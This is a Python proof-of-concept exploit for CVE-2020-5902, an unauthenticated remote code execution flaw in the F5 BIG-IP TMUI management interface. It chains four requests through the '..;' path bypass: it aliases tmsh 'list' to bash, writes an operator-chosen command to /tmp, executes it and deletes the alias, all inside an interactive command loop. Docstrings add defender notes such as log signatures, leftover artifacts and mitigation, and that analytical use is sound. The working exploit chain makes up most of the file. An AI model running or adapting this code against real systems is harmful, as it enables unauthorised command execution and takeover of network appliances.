POC / CVE-2020-5902.py PY
#coding:utf-8
import requests
import json
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import uuid
import sys

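# Request sequence issued by the functions below, in order. Each one is sent
# through the "/tmui/login.jsp/..;/tmui/locallb/workspace/" path prefix.
#   1. tmshCmd.jsp?command=create+cli+alias+private+list+command+bash   (alias tmsh "list" to bash)
#   2. fileSave.jsp?fileName=/tmp/cmd&content=id                         (write the command text to a file in /tmp)
#   3. tmshCmd.jsp?command=list+/tmp/cmd                                 (run that file through the aliased "list")
#   4. tmshCmd.jsp?command=delete+cli+alias+private+list                 (remove the alias again)
# For defenders: these four request lines, and any TMUI request path that
# contains "..;", are the strings to search for in management-interface logs.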

# Start-up banner printed once by the __main__ block. It is a raw string, so the
# backslashes in the ASCII art are literal. The "From:" line is the author's
# pointer to the Metasploit module this script cites as its source.
banner = r'''
 _______  _______    ______  _________ _______   _________ _______    _______  _______  _______ 
(  ____ \(  ____ \  (  ___ \ \__   __/(  ____ \  \__   __/(  ____ )  (  ____ )(  ____ \(  ____ \
| (    \/| (    \/  | (   ) )   ) (   | (    \/     ) (   | (    )|  | (    )|| (    \/| (    \/
| (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__    
|  __)   (_____ \   |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)   
| (            ) )  | (  \ \    | |   | | \_  )     | |   | (        | (\ (   | |      | (      
| )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | ) \ \__| (____/\| (____/\
|/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/
                                                                                                
                        CVE-2020-5902 UnAuth RCE Vuln
                            Python By Jas502n

From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
____________________________________________________________________________________________________________________________________________________
'''

def tmshCmd_exit(url,file,cmd):
    """Step 1 of 4: request tmshCmd.jsp to alias the tmsh ``list`` command to bash.

    Sends a single GET with no credentials attached, addressed through the
    ``/tmui/login.jsp/..;/`` path prefix. When the response status is 200 and
    the serialized response headers contain ``tmui``, it hands over to
    ``upload_exit``; otherwise it prints a failure line and stops.

    Args:
        url: Base URL of the management interface; the path is appended as-is.
        file: File name (placed under /tmp by the next step), passed through.
        cmd: Command text, passed through to ``upload_exit``.

    Returns:
        None. Results are reported with ``print`` only.

    Defender notes: the ``..;`` path segment after ``login.jsp`` and the
    ``create cli alias private list command bash`` query are both visible in
    the request line, so they are usable log and WAF signatures. A private
    ``list`` alias pointing at bash is a configuration artifact to check for
    on a device suspected of being hit. Mitigation is the vendor fix for
    CVE-2020-5902 and keeping the TMUI management interface off untrusted
    networks.
    """
    tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
    # Unused by the live call: only the commented-out variant below routes
    # traffic through a local intercepting proxy on 127.0.0.1:8080.
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    # verify=False skips TLS certificate validation; allow_redirects=False keeps
    # a redirect (e.g. to the login page) from being followed and read as success.
    r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
    # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)

    # Serializes the response headers to one string for the substring test.
    # NOTE(review): '_store' is internal storage of the requests header object,
    # not a public attribute -- this depends on the library's implementation.
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print type(response_str)
    # print response_str
    # Success heuristic: HTTP 200 plus the text 'tmui' anywhere in the headers.
    if r.status_code == 200 and 'tmui' in response_str:
        # print tmshCmd_url
        # "Exit" in the messages below presumably means "exists".
        print "[+] tmshCmd.jsp Exit!"
        print "[+] create cli alias private list command bash \n"
        # cmd = 'whoami'
        # NOTE(review): the alias now exists on the device. It is only removed
        # if every later step succeeds (delete_list is reached solely from
        # list_command's success path), so a failed run leaves it behind.
        upload_exit(url,file,cmd)


    else:
        print "[+] tmshCmd.jsp No Exit!\n"

def upload_exit(url,file,cmd):
    """Step 2 of 4: request fileSave.jsp to write the command text to /tmp/<file>.

    Sends one GET through the ``/tmui/login.jsp/..;/`` path prefix with the
    target file name and the command text as query parameters. On a 200
    response whose serialized headers contain ``tmui`` it calls
    ``list_command``; otherwise it prints a failure line.

    Args:
        url: Base URL of the management interface.
        file: File name to create under /tmp.
        cmd: Text written as the file content; appended to the URL verbatim.

    Returns:
        None. Results are reported with ``print`` only.

    Defender notes: because this is a GET, the full command text travels in
    the ``content`` query parameter and the file name in ``fileName``, so both
    appear in any log that records the request line. Nothing in this script
    deletes the file afterwards, so /tmp/<uuid> files are a leftover artifact.
    """
    # '%' binds tighter than '+': the file name is formatted in first, then cmd
    # is concatenated after "content=".
    fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
    # Unused by the live call; kept for the commented-out proxied variant.
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    # TLS certificate validation is disabled and redirects are not followed.
    r = requests.get(fileSave_url,verify=False,allow_redirects=False)
    # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
    # NOTE(review): reads the private '_store' mapping of the requests header object.
    response_str = json.dumps(r.headers.__dict__['_store'])
    # Same success heuristic as the other steps: 200 plus 'tmui' in the headers.
    if r.status_code == 200 and 'tmui' in response_str:
        # print fileSave_url
        print "[+] fileSave.jsp Exit!\n"
        list_command(url,file)
    else:
        # NOTE(review): on this path the alias created in step 1 is not removed.
        print "[+] fileSave.jsp No Exit!\n"

def list_command(url,file):
    """Step 3 of 4: request ``list /tmp/<file>`` via tmshCmd.jsp and print the output.

    With the ``list`` alias remapped in step 1, this request makes the device
    run the file written in step 2. The response body is parsed as JSON and
    its ``output`` field is printed, then ``delete_list`` is called to remove
    the alias.

    Args:
        url: Base URL of the management interface.
        file: Name of the file under /tmp written by ``upload_exit``.

    Returns:
        None. Results are reported with ``print`` only.

    Defender notes: a ``tmshCmd.jsp?command=list+/tmp/...`` request arriving
    shortly after a ``fileSave.jsp`` request for the same /tmp path is the
    execution step of the chain and the strongest single log correlation.
    """
    rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
    # Unused by the live call; kept for the commented-out proxied variant.
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    # TLS certificate validation is disabled and redirects are not followed.
    r = requests.get(rce_url,verify=False,allow_redirects=False)
    # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
    # NOTE(review): reads the private '_store' mapping of the requests header object.
    response_str = json.dumps(r.headers.__dict__['_store'])
    # print len(r.content)
    if r.status_code == 200 and 'tmui' in response_str:
        # 33 is an unexplained byte-length threshold; presumably it separates a
        # response with empty output from one carrying command output -- TODO confirm.
        # NOTE(review): when the body is 33 bytes or shorter nothing is printed
        # and delete_list is never called, so the alias stays on the device.
        if len(r.content) > 33:
            # print rce_url
            print "[+] Command Successfull !\n"
            # Raises if the body is not valid JSON or has no 'output' key;
            # neither case is handled here.
            command_result = json.loads(r.content)
            print "_"*90,'\n\n'
            print command_result['output']
            print "_"*90,"\n\n"
            # Cleanup of the alias happens only on this success path.
            delete_list(url)
    else:
        print "[+] Command Failed !\n"

def delete_list(url):
    """Step 4 of 4: request tmshCmd.jsp to delete the private ``list`` alias.

    Undoes the alias created by ``tmshCmd_exit``. It is called only from the
    success path of ``list_command``; the file written under /tmp is not
    touched by this or any other function in the script.

    Args:
        url: Base URL of the management interface.

    Returns:
        None. The outcome is reported with ``print`` only.

    Defender notes: a ``delete cli alias private list`` request through the
    ``..;`` path closes the chain. Its absence after the earlier requests
    suggests the alias may still be present on the device.
    """
    delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
    # Unused by the live call; kept for the commented-out proxied variant.
    proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
    # TLS certificate validation is disabled and redirects are not followed.
    r = requests.get(delete_url,verify=False,allow_redirects=False)
    # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
    # NOTE(review): reads the private '_store' mapping of the requests header object.
    response_str = json.dumps(r.headers.__dict__['_store'])
    # Success is inferred from status 200 plus 'tmui' in the headers; the
    # response body is not inspected, so the deletion itself is not confirmed.
    if r.status_code == 200 and 'tmui' in response_str:
        # print delete_url
        print "[+] delete cli alias private list Successfull! \n"
    else:
        print "[+] delete cli alias private list Failed! \n"






# Script entry point (Python 2: print statements and raw_input).
if __name__ == '__main__':
    print banner
    # Interactive loop with no exit condition: each pass prompts for one
    # command and runs the whole four-request chain again, so one session
    # produces a repeating create/fileSave/list/delete pattern in the logs.
    while 1:
        # Placeholder address; the sys.argv variant is commented out.
        # The trailing "/" here plus the leading "/" of every path likely
        # yields "//tmui/login.jsp/..;/" in the request line -- TODO confirm
        # against captured traffic before using it as a signature.
        url = "https://x.x.x.x/"
        # url = sys.argv[1]
        # A new uuid1-based file name per command, so every command leaves its
        # own file in /tmp; the script never removes them. Per the uuid module,
        # uuid1 values are built from a host node ID and a timestamp, which can
        # give responders timing and origin hints from leftover file names.
        file = str(uuid.uuid1())
        print "/tmp/" + file,"\n"
        cmd = raw_input("[+]Set Cmd= ")
        print
        tmshCmd_exit(url,file,cmd)